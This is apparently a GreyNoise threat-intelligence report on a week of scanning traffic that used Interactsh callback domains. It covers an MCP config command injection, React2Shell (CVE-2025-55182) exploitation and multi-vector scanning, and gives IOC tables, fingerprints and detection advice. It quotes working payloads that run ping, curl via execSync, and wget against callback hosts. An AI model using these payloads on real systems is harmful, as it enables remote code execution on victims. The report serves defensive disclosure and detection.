GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-01-09

GreyNoise detected 30,165 sessions from 64 unique IPs that queried well‑known out‑of‑band interaction (OAST) domains during Jan 3‑9 2026. Three distinct campaigns emerged: a high‑volume MCP‑server command‑injection burst from a single OV OVH IP (51.77.116.46), a coordinated React2Shell exploitation (CVE‑2025‑55182) across four IPs in three ASNs, and opportunistic multi‑vector scanning from MEVSPACE infrastructure. All activity leveraged Interactsh callbacks spanning six TLDs, with 44 decoded campaign IDs from 3,464 unique domains. The analysis includes JA4 fingerprint clusters, payload examples, IOC tables, and detection recommendations.
OAST
MCP
projectdiscovery
interactsh
rce
iocs
detection engineering
cybersecurity
Author

hrbrmstr

Published

January 10, 2026

GreyNoise observed 30,165 sessions from 64 unique IP addresses containing Well-known Out-of-band Interaction Domains during the week of January 3-9, 2026. Analysis reveals three distinct operational clusters: a high-volume MCP server command injection campaign from a single OVH IP (51[.]77[.]116[.]46), a coordinated React2Shell (CVE-2025-55182) exploitation effort spanning four IPs across three ASNs, and opportunistic multi-vector scanning from MEVSPACE infrastructure. All activity utilized Interactsh domains across six provider TLDs, with 44 distinct OAST campaign identifiers decoded from 3,464 unique callback domains.

Overview

This analysis covers OAST-tagged sessions observed across GreyNoise sensor infrastructure from January 3-9, 2026. The data was extracted from sessions tagged with “Contains Well-known Out-of-band Interaction Domain” and analyzed using JA4 fingerprinting, OAST domain decoding, and payload classification.

Session volume peaked on January 4 with 17,520 sessions (58% of weekly total), driven primarily by IP 51[.]77[.]116[.]46 which contributed 12,371 sessions on that single day. The temporal distribution shows sustained activity throughout the week with no significant gaps exceeding 24 hours, suggesting continuous automated scanning rather than manual operation.

JA4T fingerprint analysis identified two dominant TCP stack signatures:

  • 64240_2-4-8-1-3_1460_7 (4,846 sessions, 17 IPs) - Standard Linux/WSL profile
  • 65495_2-4-8-1-3_65495_7 (3,865 sessions, 24 IPs) - Non-standard MSS indicating tunneled or virtualized networking

The MSS 65495 fingerprint correlates with activity from known bulletproof hosting providers including MEVSPACE (AS201814) and appears across multiple campaigns, suggesting shared infrastructure or tooling.

Campaign Analysis

Campaign 1: MCP Server Command Injection (j332t)

Attribute Value
Sessions 1,245
Unique IPs 1
Source IP 51.77.116.46
ASN AS16276 (OVH SAS)
OAST Provider oast.site
First Seen 2026-01-04 07:38:54 UTC
Last Seen 2026-01-04 (single day burst)

This campaign targets MCP (Model Context Protocol) server configurations with command injection payloads (Flowise Authentication Bypass CVE-2025-8943 RCE Attempt | GreyNoise Visualizer). The attack attempts to abuse the mcpServerConfig parameter to execute arbitrary commands via ping callbacks to OAST domains.

Sample Payload:

{
  "inputs": {
    "mcpServerConfig": {
      "command": "ping",
      "args": ["d5d1gpj332t74modlrfg[REDACTED].oast.site", "-c", "1"]
    }
  }
}

The decoded OAST domain reveals:

  • Timestamp: 2026-01-04 02:36:06 EST
  • Machine ID: 63:18:ba
  • Campaign identifier: j332t

This single-IP campaign generated high volume within a compressed timeframe, consistent with automated vulnerability scanning behavior.

Campaign 2: React2Shell Exploitation (qsuzo)

Attribute Value
Sessions 1,044
Unique IPs 4
ASNs AS13335 (Cloudflare), AS60223 (Netiface), AS3243 (MEO)
Countries Portugal, Netherlands
OAST Provider oast.fun
Date Range 2026-01-04 to 2026-01-09

This campaign exploits CVE-2025-55182 (React Server Components Unsafe Deserialization CVE-2025-55182 RCE Attempt | GreyNoise Visualizer) using prototype pollution to achieve remote code execution via child_process.execSync().

IP Distribution: | IP | ASN | Sessions | |—-|—–|———-| | 195[.]24[.]237[.]218 | AS60223 | 604 | | 104[.]28[.]246[.]4 | AS13335 | 302 | | 82[.]154[.]215[.]52 | AS3243 | 84 | | 104[.]28[.]214[.]4 | AS13335 | 54 |

The presence of Cloudflare IPs (AS13335) suggests either proxied traffic or Cloudflare Workers-based attack infrastructure. The Netiface IP (195[.]24[.]237[.]218) contributed the majority of sessions.

Payload Pattern:

{\"then\": \"$1:__proto__:then\", \"status\": \"resolved_model\",
 \"reason\": -1, \"value\": \"{\\\"then\\\":\\\"$B1337\\\"}\",
 \"_response\": {\"_prefix\": \"var res=process.mainModule.require('child_process').execSync('curl https://[OAST]')\"}}

Campaign 3: Multi-Vector MEVSPACE Scanning

Attribute Value
Sessions 4,160
Source IP 94[.]26[.]88[.]61
ASN AS201814 (MEVSPACE)
Country Poland
Attack Types XStream, .NET Deserialization, Log4Shell
OAST Providers Multiple (oast.site, oast.online, oast.pro)

MEVSPACE sp. z o.o. is a known bulletproof hosting provider. This IP executed multiple exploit types across the analysis window:

Attack Type Distribution from 94[.]26[.]88[.]61:

Attack Type Sessions
XStream Deserialization 144
.NET JSON Deserialization 93
Log4Shell (CVE-2021-44228) 287
Other callback attempts 3,636

The diversity of attack payloads from a single source suggests an automated vulnerability scanner cycling through multiple exploit modules.

Additional Activity

Google Cloud Infrastructure (AS396982)

Fifteen unique IPs from Google Cloud (AS396982) contributed scanning activity, primarily from Netherlands-based instances. The consistent JA4T fingerprint 65320_2-4-8-1-3_1420_7 across these IPs suggests a shared deployment or tooling:

IP Sessions
34[.]32[.]217[.]222 245
34[.]91[.]156[.]181 124
34[.]91[.]29[.]122 118
34[.]91[.]237[.]187 115
(11 others) <100 each

IoT Command Injection

Seventeen sessions from seven unique IPs targeted IoT device command injection endpoints (e.g., /syscmd.htm). Sample payload:

submit-url=%2Fsyscmd.htm&sysCmdselect=5&save_apply=Run+Command&sysCmd=wget+http://[OAST].oast.pro

This activity was distributed across residential and hosting ASNs with no clear clustering.

Infrastructure Analysis

JA4 Fingerprint Clusters

JA4T JA4H Sessions IPs Infrastructure Type
64240_2-4-8-1-3_1460_7 ge11nn06en00_0e5d97bc8ad6 1,088 5 Standard Linux
65495_2-4-8-1-3_65495_7 ge11nn06en00_0e5d97bc8ad6 886 7 Tunneled/Virtual
64240_2-4-8-1-3_1460_7 po11nn060000_4ea4093e6290 622 8 Standard Linux
65495_2-4-8-1-3_65495_7 po11nn060000_4ea4093e6290 550 12 Tunneled/Virtual

The same JA4H fingerprints appearing with both standard and non-standard JA4T values indicates the same HTTP tooling deployed across different network environments.

OAST Provider Distribution

Provider Unique Domains
oast.site 1,618
oast.online 658
oast.me 473
oast.fun 261
oast.pro 257
oast.live 195
dnslog.cn 2

All providers are Interactsh infrastructure except for 2 dnslog.cn domains. The use of multiple Interactsh TLDs within single campaigns suggests operational security measures to avoid domain-based blocking.

Attribution Assessment

Confidence: Medium

The three primary campaigns show distinct operational characteristics:

  1. j332t (MCP Server): Single IP, single day, novel attack vector targeting AI/LLM infrastructure. The specificity of the payload suggests an operator with knowledge of MCP protocol implementations. OVH hosting provides limited attribution value.

  2. qsuzo (React2Shell): Multi-IP coordination across three ASNs suggests either a distributed scanning framework or an initial access broker operation. The use of Cloudflare edge IPs complicates origin attribution.

  3. MEVSPACE activity: Bulletproof hosting origin is consistent with professional scanning operations. The multi-vector approach suggests automated vulnerability assessment tooling rather than targeted exploitation.

The decoded OAST campaign identifiers (44 unique) do not show clear correlation between otherwise distinct fingerprint clusters, suggesting these campaigns are operationally independent.

Network IOCs

Primary IPs (>200 sessions)

IP ASN Org Sessions
51[.]77[.]116[.]46 AS16276 OVH SAS 16,814
94[.]26[.]88[.]61 AS201814 MEVSPACE 4,160
195[.]24[.]237[.]218 AS60223 Netiface 1,952
104[.]28[.]246[.]4 AS13335 Cloudflare 944
209[.]38[.]59[.]248 AS14061 DigitalOcean 763
139[.]59[.]217[.]230 AS14061 DigitalOcean 717
198[.]98[.]61[.]39 AS53667 FranTech 335
188[.]212[.]125[.]110 AS202448 MVPS LTD 328
80[.]191[.]90[.]190 AS58224 Iran Telecom 323
185[.]181[.]183[.]41 AS206596 Iran (CRCIS) 308

JA4 Fingerprints for Detection

# JA4T - Non-standard MSS (bulletproof/tunneled)
65495_2-4-8-1-3_65495_7

# JA4T - Standard Linux
64240_2-4-8-1-3_1460_7

# JA4H - Common HTTP signature across campaigns
ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000
po11nn060000_4ea4093e6290_000000000000_000000000000

Detection Recommendations

  1. Block or alert on MSS 65495 TCP connections - This non-standard value is highly anomalous and correlates with bulletproof hosting infrastructure.

  2. Monitor for MCP server configuration manipulation - Payloads containing mcpServerConfig with command execution should trigger investigation.

  3. Detect React2Shell patterns - Look for __proto__ combined with child_process in request bodies.

  4. Prioritize patching for:

    • CVE-2025-55182 (React2Shell)
    • CVE-2021-44228 (Log4Shell)
    • XStream deserialization vulnerabilities

  5. Consider blocking Interactsh callback domains at the network perimeter - The oast.* TLDs are rarely used legitimately outside of authorized security testing.

GNQL Queries

# All OAST activity in the past 7 days
tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d

# MEVSPACE infrastructure
metadata.asn:AS201814 last_seen:7d

# React2Shell exploitation attempts
cve:CVE-2025-55182 last_seen:7d